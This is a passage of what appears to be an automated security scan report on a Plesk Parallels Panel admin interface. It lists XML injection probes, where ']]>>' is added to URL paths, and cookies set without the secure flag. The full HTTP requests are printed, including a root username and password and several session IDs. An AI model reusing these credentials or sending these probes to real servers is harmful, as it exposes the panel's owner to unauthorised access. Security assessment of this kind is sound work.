The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/top]]>>/layout.css?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:12 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.176. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/skins/default/plesk/css/top/layout.css [REST URL parameter 6]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /skins/default/plesk/css/top/layout.css

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /skins/default/plesk/css/top/layout.css]]>>?2 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:02:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.177. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%2Fadmin%2Fhome%2Fadmin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:35 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.178. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/create-subscription

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/account/create-subscription?redirectUrl=%2F HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/home/admin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:09 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.179. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/power-mode-logout [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/account/power-mode-logout

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/account/power-mode-logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription?redirectUrl=%2F
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:38 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.180. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/admin-home HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/?start_page=%2Fadmin%2Fhome%2Fadmin
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:20 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.181. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home/installed-applications/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/admin-home/installed-applications/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/admin-home/installed-applications/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:31 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.182. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/auth/logout [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/auth/logout

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/auth/logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:05 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.183. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/account/action-name/create-subscription [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/account/action-name/create-subscription

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/help/redirect/controller-name/account/action-name/create-subscription HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:19 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.184. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/admin-home/action-name/index [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/admin-home/action-name/index

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/help/redirect/controller-name/admin-home/action-name/index HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:22 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.185. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/help/redirect/controller-name/subscription/action-name/logout [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/help/redirect/controller-name/subscription/action-name/logout

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/help/redirect/controller-name/subscription/action-name/logout HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:20:19 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.186. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/admin-home.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/scripts/admin-home.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/scripts/admin-home.js?1301570628 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:00:16 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.187. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/scripts/smb.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/scripts/smb.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/scripts/smb.js?1301570628 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/account/create-subscription?redirectUrl=%2F
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=home

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:59:38 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.188. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/user/list/ [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /smb/user/list/

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /smb]]>>/user/list/ HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/smb/admin-home
Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 19:01:38 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

3.189. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /top.php3

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /top.php3]]>> HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; locale=en-US

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Fri, 23 Sep 2011 18:26:14 GMT
Server: sw-cp-server

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

4. SSL cookie without secure flag set  previous  next
There are 62 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


4.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /login_up.php3

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /login_up.php3 HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Connection: keep-alive
Content-Length: 55
Cache-Control: max-age=0
Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

login_name=root&passwd=JAlQj9rh&locale_id=default&send=

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 23 Sep 2011 18:24:04 GMT
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Content-Type: text/html; charset=utf-8
X-Plesk: PSA-Key/PLSK016479390000
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=0b237ea12b7edacbf865b7dcdce30fae; path=/
Set-Cookie: locale=en-US; expires=Sat, 22-Sep-2012 18:24:06 GMT; path=/
Set-Cookie: no_frames=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_root_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_login_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Set-Cookie: no_frames_logout_page=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Date: Fri, 23 Sep 2011 18:24:06 GMT
Server: sw-cp-server
Content-Length: 1232


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-10111
...[SNIP]...

4.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/app/usage

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /admin/app/usage HTTP/1.1
Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools
Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools

Response

HTTP/1.1 200 OK
Expires: Mon, 24 Oct 2011 15:27:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: max-age=2592000
Cache-Control: post-check=0, pre-check=0
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: psaContext=tools; path=/
Content-type: text/html
Date: Sat, 24 Sep 2011 15:27:17 GMT
Server: sw-cp-server
Content-Length: 8399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<met
...[SNIP]...

4.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:   /admin/customer-service-plan/edit/id/5

Issue detail

